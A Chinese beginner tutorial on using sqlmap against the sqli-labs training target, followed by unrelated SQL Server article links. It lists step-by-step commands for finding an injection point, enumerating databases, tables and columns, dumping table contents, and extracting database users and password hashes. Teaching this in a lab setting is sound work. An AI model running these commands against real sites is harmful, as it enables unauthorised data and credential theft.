SQL注入之sqlmap入門學(xué)習(xí)
原來sql注入如此簡單
以SQL注入靶場sqli-labs第一關(guān)為例,進行sqlmap工具的使用分享。
一、判斷是否存在注入點
使用命令:
使用命令:sqlmap -u "http://49.232.78.252:83/Less-1/?id=1"
有圖中白色背景的 則判斷出有注入點

二、查詢當(dāng)前用戶下所有數(shù)據(jù)庫
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --dbs
可以看到有五個表

三、獲取數(shù)據(jù)庫中的表名
選取一個challenges數(shù)據(jù)庫,獲取此庫的表名
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges --tables

四、獲取表中的字段名
選取表T5M0QG6FM2,獲取其中字段名
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 –columns

五、獲取字段內(nèi)容
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 --columns –dump

六、獲取數(shù)據(jù)庫的所有用戶
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –users
使用該命令就可以列出所有管理用戶

七、獲取數(shù)據(jù)庫用戶的密碼
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –passwords

八、獲取當(dāng)前網(wǎng)站數(shù)據(jù)庫的名稱
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-db

可以看到當(dāng)前的數(shù)據(jù)庫是 security
九、獲取當(dāng)前網(wǎng)站數(shù)據(jù)庫的用戶名稱
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-user
當(dāng)前用戶是root

到此這篇關(guān)于SQL注入之sqlmap入門學(xué)習(xí)的文章就介紹到這了,更多相關(guān)sqlmap入門內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!
相關(guān)文章
CASE表達(dá)式實現(xiàn)基于條件邏輯來返回一個值
針對一列,基于條件邏輯來返回一個值,那么,這時候就需要使用到CASE表達(dá)式了,下面是具體的應(yīng)用2014-07-07
SqlServer2012中First_Value函數(shù)簡單分析
SQL SERVER 2012 T-SQL新增幾個聚合函數(shù): FIRST_VALUE LAST_VALUE LEAD LAG,今天我們首先來簡單分析下FIRST_VALUE,希望對大家有所幫助,能夠盡快熟悉這個聚合函數(shù)2014-08-08
sqlserver 中一些??吹闹笜?biāo)和清除緩存的方法
sqlserver 中一些常看的指標(biāo)和清除緩存的方法2009-07-07
SQL?Server?2012?搭建數(shù)據(jù)庫AlwaysOn(數(shù)據(jù)庫高可用集群)
這篇文章主要介紹了SQL?Server?2012?搭建數(shù)據(jù)庫AlwaysOn(數(shù)據(jù)庫高可用集群),需要的朋友可以參考下2023-05-05
異地遠(yuǎn)程訪問本地SQL Server數(shù)據(jù)庫
數(shù)據(jù)庫的重要性相信大家都有所了解,作為各種數(shù)據(jù)的電子資料夾,其中可能包含了各種信息,這篇文章就為大家介紹了如何使用cpolar內(nèi)網(wǎng)穿透,遠(yuǎn)程連接和操作SQL Server。2023-04-04

